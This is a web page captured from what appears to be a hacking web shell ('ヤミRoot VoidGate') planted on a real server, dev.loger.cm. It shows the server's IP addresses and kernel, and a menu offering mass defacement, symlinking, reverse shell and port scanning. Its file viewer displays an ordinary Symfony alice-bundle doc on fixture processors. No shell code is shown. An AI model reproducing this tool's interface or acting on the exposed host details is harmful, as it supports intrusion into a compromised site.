ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
hautelook
/
alice-bundle
/
doc
/
Viewing: alice-processors.md
# Alice Processors Given you declared a processor `App\DataFixtures\Processor\UserProcessor`, you have to declare it as a service with the tag `fidry_alice_data_fixtures.processor` to register it unless `autoconfigure` is enabled: ```yaml # config/services.yaml services: _defaults: autoconfigure: true App\DataFixtures\Processor\UserProcessor: ~ ``` Without `autoconfigure`: ```yaml # config/services.yaml services: App\DataFixtures\Processor\UserProcessor: tags: [ { name: fidry_alice_data_fixtures.processor } ] ``` Refer to [FidryAliceDataFixtures][alice-data-fixture-processors] for a more advanced documentation. Previous chapter: [Custom Faker providers](faker-providers.md)<br /> [Back to Table of Contents](../README.md#documentation) [alice-data-fixture-processors]: https://github.com/theofidry/AliceDataFixtures#processors
Coded With 💗 by
0x6ick